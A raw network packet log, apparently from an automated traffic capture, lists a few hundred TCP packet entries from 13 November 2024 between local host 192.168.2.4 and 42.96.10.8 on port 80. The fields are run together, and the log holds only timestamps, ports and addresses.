                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387779951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387790918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387813091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387844086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387859106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387873888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387888908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387893915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387903929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387933016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387945890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387960911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387976885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.387995958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388019085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388024092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388036966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388052940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388084888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388086081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388102055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388118029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388130903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388153076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388251066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388279915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388293982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388335943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388408899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388425112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388439894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388447046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388465881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388474941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388484001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388497114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388511896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388536930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388549089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388561010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388576984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388593912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388609886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388617039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388647079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388655901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388665915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388708115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388762951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388777971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388792038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388817072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388818979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388834953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.388859987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.430558920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438498974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438518047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438534021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438551903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438581944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438596010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438596010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438600063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438616991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438632965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438652992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438663006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438672066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438680887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438698053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438714027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438731909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438760042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438769102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438786030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438802004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438824892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438828945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438847065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438863039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438880920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438884974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.438898087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470251083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470273972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470292091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470304012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470308065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470323086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470329046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.470372915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.479258060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.479275942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.479293108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.479307890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.479320049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.479347944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480629921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480644941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480670929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480686903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480691910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480705023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480721951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480746031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.480772972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499385118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499406099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499433994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499450922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499459028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499479055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499488115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499497890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499515057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499532938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499540091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499551058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499567986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499578953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499594927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499603987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499612093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499628067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499644995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499648094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499659061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499675989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499692917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499695063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.499722004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500744104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500761032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500777960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500792027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500812054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500833988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500859976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500875950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500890970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500895977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500909090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500925064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500941992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500947952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500957966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500968933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.500976086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501000881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501002073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501019001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501034021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501039982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501053095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501068115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501074076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501084089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501101017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501104116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501128912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501135111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501158953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501188040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501195908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501204014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501219988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501235962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501245022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501251936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501266956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501281023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501291990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501307964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501312017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501323938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501339912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501355886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501370907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501370907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501384020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501386881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501415968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501421928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501432896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501451969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501458883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501470089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501487017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501487017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501503944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501522064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501538038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501540899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501554966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501564980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501571894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501588106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501597881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501616955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501635075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501647949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501657963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501662970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501678944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501679897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501693010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501708031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501708984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501725912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501732111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501753092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501765013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501769066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501797915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501806021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501816034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501832008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501847982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501864910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501872063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501883030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501892090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501902103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501916885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501925945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501936913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501951933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.501975060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502000093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502010107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502027035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502042055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502062082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502065897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502078056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502094984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502119064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502140045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502140999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502160072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502182961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502196074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502204895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502213955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502242088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502281904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502299070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502314091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502330065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502353907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502451897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502501011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502516985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502554893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502579927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502597094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502613068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502645969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502656937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502660036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502676964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502692938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502707005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502728939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502748966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502749920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502768040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502784014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502799988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502805948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502856016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502875090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502891064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502909899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502923965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502929926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502954006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502968073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502985954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.502995014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503007889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503012896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503027916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503043890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503060102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503077984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.503098965 CET804973342.96.10.8192.168.2.4
